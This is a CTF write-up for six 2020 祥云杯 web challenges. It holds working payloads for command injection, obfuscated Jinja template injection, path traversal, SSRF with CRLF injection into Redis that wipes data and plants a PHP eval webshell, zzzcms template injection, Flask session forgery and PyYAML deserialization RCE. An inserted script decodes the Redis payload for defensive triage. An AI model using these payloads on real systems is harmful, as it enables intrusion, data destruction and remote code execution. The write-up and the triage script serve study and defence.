
2020 祥云杯 Web Writeup

Web:

PING | SOLVED | Working: crazyman Neorah dkk

Command execution. The filter is bypassed with %09 (a tab in place of a space).

?url=|ls%09-all%09/etc 

A .findflag directory is found under /etc.

Base64 plus wildcards bypass the filter and read the flag directly:

?url=|base64%09/etc/.findfla?/fla?.txt


flaskbot | SOLVED | Working: dkk

Python's nan is used to bypass the binary-search algorithm. The name field has a template injection and a WAF.

{{lipsum.__globals__.__builtins__.get('\x65\x76\x61\x6c')("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27ls\x27\x29\x2e\x72\x65\x61\x64\x28\x29")}}
Bypass the WAF, execute commands, and get the flag.

easygogogo | SOLVED | Working: dkk

Upload a file named ../../../../../../../flag

This yields the cookie that reads the flag.

Then start a fresh instance, upload any file, and use the cookie from the first instance to read the flag.

doyouknowssrf | SOLVED | Working: dkk

http://u:[email protected]:[email protected]/ bypasses parse_url.

Scan internal ports.


Port 5000 on the internal network has a service (probably Python):

Python-urllib/3.7

Blind guess: CRLF injection against Redis.

Sure enough, there is a Redis service; write a PHP shell directly through the unauthenticated instance.

Payload:

http://u:[email protected]:[email protected]/?url=http%253a%252f%252f127.0.0.1%253a6379?q%3dHTTP/1.1%250a%250dheader%3Avalue%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B1%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

Got a shell.
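To see what the payload above actually makes Redis do, here is an added triage script (not part of the writeup): it decodes the url parameter twice, locates the RESP stream smuggled past the SSRF client by the CRLF injection, and lists the resulting Redis commands. The query string is copied from the payload above; the obfuscated credential@host prefix is left out.

```python
# Added triage example: decode the doyouknowssrf payload and list the smuggled Redis commands.
import re
from urllib.parse import parse_qs, unquote

# Query string copied from the writeup's payload (host prefix omitted).
CAPTURED_QUERY = "url=http%253a%252f%252f127.0.0.1%253a6379?q%3dHTTP/1.1%250a%250dheader%3Avalue%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B1%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A"

def decode_url_param(query: str) -> str:
    """Return the url parameter with both layers of percent-encoding removed."""
    once = parse_qs(query)["url"][0]   # parse_qs performs the first decode
    return unquote(once)               # second decode produces the raw CR/LF bytes

def parse_resp(stream: str) -> list[list[str]]:
    """Parse RESP arrays of bulk strings (*N CRLF $len CRLF data CRLF ...) into commands."""
    cmds, pos = [], 0
    while pos < len(stream):
        if stream[pos] != "*":         # skip stray bytes between commands
            pos += 1
            continue
        end = stream.index("\r\n", pos)
        argc, pos = int(stream[pos + 1:end]), end + 2
        args = []
        for _ in range(argc):
            if stream[pos] != "$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = stream.index("\r\n", pos)
            length, pos = int(stream[pos + 1:end]), end + 2
            args.append(stream[pos:pos + length])
            pos += length + 2          # skip the data and its trailing CRLF
        cmds.append(args)
    return cmds

def smuggled_commands(query: str) -> list[list[str]]:
    """Extract the Redis commands hidden inside the SSRF target URL."""
    decoded = decode_url_param(query)
    m = re.search(r"\*\d+\r\n", decoded)   # RESP begins at the first array header
    return parse_resp(decoded[m.start():]) if m else []

def risk_findings(cmds: list[list[str]]) -> set[str]:
    """Flag sequences that turn an unauthenticated Redis into a file-write primitive."""
    low = [[a.lower() for a in c] for c in cmds]
    has = lambda *prefix: any(c[:len(prefix)] == list(prefix) for c in low)
    findings = set()
    if has("flushall"):
        findings.add("data-destruction: FLUSHALL")
    if has("config", "set", "dir") and has("config", "set", "dbfilename") and has("save"):
        findings.add("arbitrary-file-write: CONFIG SET dir/dbfilename + SAVE")
    return findings

if __name__ == "__main__":
    for cmd in smuggled_commands(CAPTURED_QUERY):
        print(cmd)
    print(risk_findings(smuggled_commands(CAPTURED_QUERY)))
```

The same parser works on any captured request of this shape; the two findings it reports are the signals a WAF or proxy log review should alert on.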

easyzzz | SOLVED | Working: dkk

A zzzcms site; an information leak gives access to the admin backend.

https://guokeya.github.io/post/mURMabFKM/

keys={if:1)show_source(hex2bin(base_convert(203581841767,10,16)));die();//}{end if}

The search field has a WAF that blocks the if tag.

Looking at the 1.8.0 source, find another tag that is replaced with an empty string and use it to split up the if tag:

$payload = "{i{hidestr:}f:1)show_source(hex2bin(base_convert(203581841767,10,16)));die();//}{end i{hidestr:}f}";
echo parserOtherLabel($payload);

profile system | SOLVED | Working: dkk

The challenge lets you upload a yaml/yml file.

Guessing at https://github.com/yaml/pyyaml/issues/420. Directory scanning finds /uploads/dump.sql, which returns a 500.

Looks like there is an arbitrary file read.

Read app.py.

Use the key to forge the session:

python flask_session_cookie_manager3.py encode -t '{"filename":"5.yaml","priviledge":"elite"}' -s "Th1s_is_A_Sup333er_s1cret_k1yyyyy"

Upload the YAML RCE file from https://github.com/yaml/pyyaml/issues/420 and write the shell into the static uploads directory:

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - ["\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x22\x2f\x72\x65\x61\x64\x66\x6c\x61\x67\x20\x2f\x20\x3e\x20\x75\x70\x6c\x6f\x61\x64\x73\x2f\x32\x2e\x74\x78\x74\x22\x29"]



Last update: 2021-04-25